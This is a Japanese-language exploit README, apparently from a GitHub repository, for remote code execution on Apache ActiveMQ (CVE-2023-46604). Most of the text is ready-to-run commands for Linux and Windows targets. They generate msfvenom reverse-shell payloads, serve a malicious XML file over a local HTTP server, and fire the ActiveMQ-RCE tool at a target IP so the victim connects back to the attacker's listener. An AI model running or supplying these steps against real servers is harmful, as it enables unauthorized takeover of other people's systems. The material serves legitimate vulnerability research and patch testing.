
Apache ActiveMQ (CVE_2023-46604) のリバースシェルエクスプロイトを達成する
このエクスプロイトは、https://github.com/X1cT34m (https://github.com/X1r0z/ActiveMQ-RCE) で利用可能な基礎的な研究に基づいています。私たちは、Metasploit Framework (https://github.com/rapid7/metasploit-framework) を活用してリバースシェルを実現する技術をさらに発展させました。
重要: XML ファイル内の IP アドレス (11行目の 0.0.0.0) を、ペイロードが生成される IP アドレスに手動で変更してください。以下のコマンドに従う場合、それはリスナー IP アドレスになります。また、{IP_Of_Hosted_XML_File} はリスナー IP アドレスになります。
Linux/Unix ターゲット向け
git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f elf -o test.elf
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-linux.xml
Windows ターゲット向け
git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f eXE -o test.exe
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-windows.xml



https://github.com/Anon4mous の積極的なサポートに心から感謝します。